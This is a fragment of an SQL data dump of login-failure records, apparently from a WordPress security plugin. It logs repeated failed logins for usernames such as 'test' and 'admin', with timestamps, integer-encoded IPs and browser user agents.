(98767, 1492132567.929758, 1, 'loginFailInvalidUsername', 'test', 0, 1534241720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98766, 1492131983.976174, 1, 'loginFailInvalidUsername', 'test', 0, 1768890868, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98765, 1492126118.936569, 1, 'loginFailInvalidUsername', 'test', 0, 1731167281, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98764, 1492122825.061357, 1, 'loginFailInvalidUsername', 'test', 0, 3159373275, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98763, 1492116361.422038, 1, 'loginFailInvalidUsername', 'test', 0, 1893182448, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98762, 1492116359.762756, 1, 'loginFailInvalidUsername', 'test', 0, 1893182448, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98761, 1492114280.900546, 1, 'loginFailInvalidUsername', 'test', 0, 1326665543, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98760, 1492114279.712316, 1, 'loginFailInvalidUsername', 'test', 0, 1326665543, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98759, 1492111093.339057, 1, 'loginFailInvalidUsername', 'test', 0, 688738866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98758, 1492111052.481838, 1, 'loginFailInvalidUsername', 'test', 0, 1365262172, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98757, 1492111051.506695, 1, 'loginFailInvalidUsername', 'test', 0, 1365262172, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98756, 1492110466.287582, 1, 'loginFailInvalidUsername', 'test', 0, 3169684338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98755, 1492110465.267994, 1, 'loginFailInvalidUsername', 'test', 0, 3169684338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98754, 1492108332.626267, 1, 'loginFailValidUsername', 'julie', 2, 1565317613, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(98753, 1492108332.625353, 1, 'loginFailValidUsername', 'pablo', 3, 1565317613, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(98752, 1492108218.857468, 1, 'loginFailValidUsername', 'pablo', 3, 2997180598, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(98751, 1492108218.215742, 1, 'loginFailValidUsername', 'julie', 2, 2997180598, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(98750, 1492107837.075454, 1, 'loginFailInvalidUsername', 'test', 0, 1538301742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98749, 1492107835.635779, 1, 'loginFailInvalidUsername', 'test', 0, 1538301742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98748, 1492103587.728012, 1, 'loginFailInvalidUsername', 'test', 0, 1561078904, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98747, 1492103586.125988, 1, 'loginFailInvalidUsername', 'test', 0, 1561078904, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98746, 1492102825.871580, 1, 'loginFailInvalidUsername', 'test', 0, 1569564619, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98745, 1492102824.884599, 1, 'loginFailInvalidUsername', 'test', 0, 1569564619, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98744, 1492098343.523968, 1, 'loginFailInvalidUsername', 'test', 0, 3393078506, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98743, 1492098341.924353, 1, 'loginFailInvalidUsername', 'test', 0, 3393078506, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98742, 1492095359.844239, 1, 'loginFailInvalidUsername', 'test', 0, 1336938262, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98741, 1492095358.661224, 1, 'loginFailInvalidUsername', 'test', 0, 1336938262, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98740, 1492088316.684087, 1, 'loginFailInvalidUsername', 'test', 0, 1572527283, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98739, 1492088315.564417, 1, 'loginFailInvalidUsername', 'test', 0, 1572527283, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98738, 1492087800.308321, 1, 'loginFailInvalidUsername', 'test', 0, 609459476, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98737, 1492087796.909211, 1, 'loginFailInvalidUsername', 'test', 0, 609459476, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98736, 1492081343.382184, 1, 'loginFailInvalidUsername', 'test', 0, 704272349, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98735, 1492078023.978951, 1, 'loginFailInvalidUsername', 'test', 0, 2537483960, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98734, 1492078022.598375, 1, 'loginFailInvalidUsername', 'test', 0, 2537483960, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98733, 1492077320.069033, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98732, 1492077319.750621, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98731, 1492077319.429670, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98730, 1492077319.112995, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98729, 1492077318.713658, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98728, 1492077318.372024, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98727, 1492077318.055369, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98726, 1492077317.713935, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98725, 1492077317.397048, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98724, 1492077317.079885, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98723, 1492077316.749907, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98722, 1492077316.432160, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98721, 1492077316.115320, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98720, 1492077315.797914, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98719, 1492077315.469115, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98718, 1492077315.143902, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98717, 1492077314.823360, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98716, 1492077314.506631, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98715, 1492077314.184619, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98714, 1492072432.550064, 1, 'loginFailInvalidUsername', 'test', 0, 453423111, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98713, 1492072431.275737, 1, 'loginFailInvalidUsername', 'test', 0, 453423111, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98712, 1492072401.383004, 1, 'loginFailInvalidUsername', 'test', 0, 2079106212, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98711, 1492072397.714304, 1, 'loginFailInvalidUsername', 'test', 0, 2079106212, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98710, 1492069063.186357, 1, 'loginFailInvalidUsername', 'test', 0, 1733826562, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98709, 1492069061.414712, 1, 'loginFailInvalidUsername', 'test', 0, 1733826562, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98708, 1492065841.169643, 1, 'loginFailInvalidUsername', 'test', 0, 3302427236, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98707, 1492065839.461867, 1, 'loginFailInvalidUsername', 'test', 0, 3302427236, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98706, 1492064624.001340, 1, 'loginFailInvalidUsername', 'test', 0, 3127732489, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98705, 1492064372.863222, 1, 'loginFailInvalidUsername', 'test', 0, 1463863771, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98704, 1492064371.865361, 1, 'loginFailInvalidUsername', 'test', 0, 1463863771, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98703, 1492059995.906677, 1, 'loginFailInvalidUsername', 'test', 0, 1333900890, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98702, 1492059994.785119, 1, 'loginFailInvalidUsername', 'test', 0, 1333900890, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98701, 1492054150.885917, 1, 'loginFailInvalidUsername', 'test', 0, 2058432850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98700, 1492054149.602239, 1, 'loginFailInvalidUsername', 'test', 0, 2058432850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98699, 1492053936.265342, 1, 'loginFailInvalidUsername', 'test', 0, 1892216991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98698, 1492053934.541919, 1, 'loginFailInvalidUsername', 'test', 0, 1892216991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98697, 1492048177.381845, 1, 'loginFailInvalidUsername', 'test', 0, 3287640228, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98696, 1492048176.438707, 1, 'loginFailInvalidUsername', 'test', 0, 3287640228, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98695, 1492044113.906701, 1, 'loginFailInvalidUsername', 'test', 0, 411903542, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98694, 1492044112.680643, 1, 'loginFailInvalidUsername', 'test', 0, 411903542, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98693, 1492042112.018423, 1, 'loginFailInvalidUsername', 'test', 0, 1502039210, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98692, 1492040807.300532, 1, 'loginFailInvalidUsername', 'test', 0, 3484324916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98691, 1492040805.872525, 1, 'loginFailInvalidUsername', 'test', 0, 3484324916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98690, 1492036821.989714, 1, 'loginFailInvalidUsername', 'test', 0, 1731245353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98689, 1492036820.359239, 1, 'loginFailInvalidUsername', 'test', 0, 1731245353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98688, 1492033040.580603, 1, 'loginFailInvalidUsername', 'test', 0, 694506395, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98687, 1492033038.768529, 1, 'loginFailInvalidUsername', 'test', 0, 694506395, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98686, 1492028175.781766, 1, 'loginFailInvalidUsername', 'test', 0, 2954991853, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98685, 1492023371.248203, 1, 'loginFailInvalidUsername', 'test', 0, 3017106923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98684, 1492023369.496797, 1, 'loginFailInvalidUsername', 'test', 0, 3017106923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98683, 1492016362.678834, 1, 'loginFailInvalidUsername', 'test', 0, 1840340872, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98682, 1492016361.497917, 1, 'loginFailInvalidUsername', 'test', 0, 1840340872, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98681, 1492014058.078281, 1, 'loginFailInvalidUsername', 'test', 0, 1549883569, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98680, 1492014056.757940, 1, 'loginFailInvalidUsername', 'test', 0, 1549883569, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98679, 1492013729.219994, 1, 'loginFailInvalidUsername', 'test', 0, 1328455933, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98678, 1492013728.069786, 1, 'loginFailInvalidUsername', 'test', 0, 1328455933, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98677, 1492013686.558425, 1, 'loginFailValidUsername', 'pablo', 3, 2997180598, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(98676, 1492013685.815835, 1, 'loginFailValidUsername', 'julie', 2, 2997180598, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(98675, 1492012915.745832, 1, 'loginFailInvalidUsername', 'test', 0, 1849894389, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98674, 1492012913.902005, 1, 'loginFailInvalidUsername', 'test', 0, 1849894389, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98673, 1492012015.655846, 1, 'loginFailInvalidUsername', 'test', 0, 1729119501, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98672, 1492012014.334790, 1, 'loginFailInvalidUsername', 'test', 0, 1729119501, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98671, 1492007166.113781, 1, 'loginFailInvalidUsername', 'test', 0, 3319909429, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98670, 1492007163.507706, 1, 'loginFailInvalidUsername', 'test', 0, 3319909429, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98669, 1492006626.974373, 1, 'loginFailInvalidUsername', 'test', 0, 657611280, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98668, 1492006625.616287, 1, 'loginFailInvalidUsername', 'test', 0, 657611280, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98666, 1492006242.084661, 1, 'loginFailInvalidUsername', 'test', 0, 1855938838, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98667, 1492006243.822571, 1, 'loginFailInvalidUsername', 'test', 0, 1855938838, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98665, 1492001789.413154, 1, 'loginFailInvalidUsername', 'test', 0, 2983019920, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98664, 1492001787.951039, 1, 'loginFailInvalidUsername', 'test', 0, 2983019920, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98663, 1491998908.888719, 1, 'loginFailInvalidUsername', 'test', 0, 2036512991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98661, 1491995118.169022, 1, 'loginFailInvalidUsername', 'test', 0, 2872932992, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98662, 1491995119.576717, 1, 'loginFailInvalidUsername', 'test', 0, 2872932992, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98660, 1491992270.184735, 1, 'loginFailInvalidUsername', 'test', 0, 1602695291, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98659, 1491991975.725748, 1, 'loginFailInvalidUsername', 'test', 0, 1487682955, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98658, 1491985215.658802, 1, 'loginFailInvalidUsername', 'test', 0, 3643263381, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98656, 1491983205.232316, 1, 'loginFailInvalidUsername', 'test', 0, 1371068180, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98657, 1491985214.609746, 1, 'loginFailInvalidUsername', 'test', 0, 3643263381, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98655, 1491983204.146561, 1, 'loginFailInvalidUsername', 'test', 0, 1371068180, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98654, 1491982404.454452, 1, 'loginFailInvalidUsername', 'test', 0, 737502761, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98653, 1491982403.174224, 1, 'loginFailInvalidUsername', 'test', 0, 737502761, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98651, 1491979543.716917, 1, 'loginFailInvalidUsername', 'test', 0, 1300103706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98652, 1491979545.200007, 1, 'loginFailInvalidUsername', 'test', 0, 1300103706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98650, 1491977824.120166, 1, 'loginFailInvalidUsername', 'test', 0, 835614709, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98649, 1491977822.662720, 1, 'loginFailInvalidUsername', 'test', 0, 835614709, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98648, 1491976556.711560, 1, 'loginFailInvalidUsername', 'test', 0, 1546912603, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98647, 1491976555.647956, 1, 'loginFailInvalidUsername', 'test', 0, 1546912603, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98646, 1491974046.595878, 1, 'loginFailInvalidUsername', 'test', 0, 694240377, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98645, 1491974019.180787, 1, 'loginFailValidUsername', 'admin', 1, 3308123913, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98644, 1491967095.725861, 1, 'loginFailInvalidUsername', 'test', 0, 800631730, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98643, 1491967094.317901, 1, 'loginFailInvalidUsername', 'test', 0, 800631730, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98642, 1491965790.243044, 1, 'loginFailInvalidUsername', 'test', 0, 2320229452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98641, 1491965788.678242, 1, 'loginFailInvalidUsername', 'test', 0, 2320229452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98640, 1491958505.350334, 1, 'loginFailInvalidUsername', 'test', 0, 3389449650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98639, 1491958503.501071, 1, 'loginFailInvalidUsername', 'test', 0, 3389449650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98638, 1491958190.113282, 1, 'loginFailInvalidUsername', 'test', 0, 3320681808, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98637, 1491958188.681741, 1, 'loginFailInvalidUsername', 'test', 0, 3320681808, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98636, 1491956342.263369, 1, 'loginFailValidUsername', 'julie', 2, 2513075873, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(98635, 1491955422.403837, 1, 'loginFailInvalidUsername', 'test', 0, 1564673684, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98634, 1491943772.308494, 1, 'loginFailInvalidUsername', 'test', 0, 2919470527, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98633, 1491943770.916576, 1, 'loginFailInvalidUsername', 'test', 0, 2919470527, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98632, 1491943532.537123, 1, 'loginFailInvalidUsername', 'test', 0, 787923107, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98631, 1491943531.444666, 1, 'loginFailInvalidUsername', 'test', 0, 787923107, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98629, 1491943520.412182, 1, 'loginFailInvalidUsername', 'test', 0, 623054046, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98630, 1491943521.573624, 1, 'loginFailInvalidUsername', 'test', 0, 623054046, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98628, 1491941187.000758, 1, 'loginFailValidUsername', 'admin', 1, 3103997920, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2700.13 Safari/537.36'),
(98627, 1491940245.890727, 1, 'loginFailInvalidUsername', 'test', 0, 1744310190, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98626, 1491940244.359866, 1, 'loginFailInvalidUsername', 'test', 0, 1744310190, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98625, 1491935370.287061, 1, 'loginFailInvalidUsername', 'test', 0, 3206613747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98624, 1491935368.831126, 1, 'loginFailInvalidUsername', 'test', 0, 3206613747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98623, 1491930032.459466, 1, 'loginFailInvalidUsername', 'test', 0, 2380442744, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98622, 1491930030.359086, 1, 'loginFailInvalidUsername', 'test', 0, 2380442744, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98621, 1491926731.674601, 1, 'loginFailInvalidUsername', 'test', 0, 1600049530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98620, 1491926730.634788, 1, 'loginFailInvalidUsername', 'test', 0, 1600049530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98619, 1491920986.902940, 1, 'loginFailInvalidUsername', 'test', 0, 1834783836, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98618, 1491920985.812002, 1, 'loginFailInvalidUsername', 'test', 0, 1834783836, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98617, 1491919740.455144, 1, 'loginFailInvalidUsername', 'test', 0, 2567295251, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
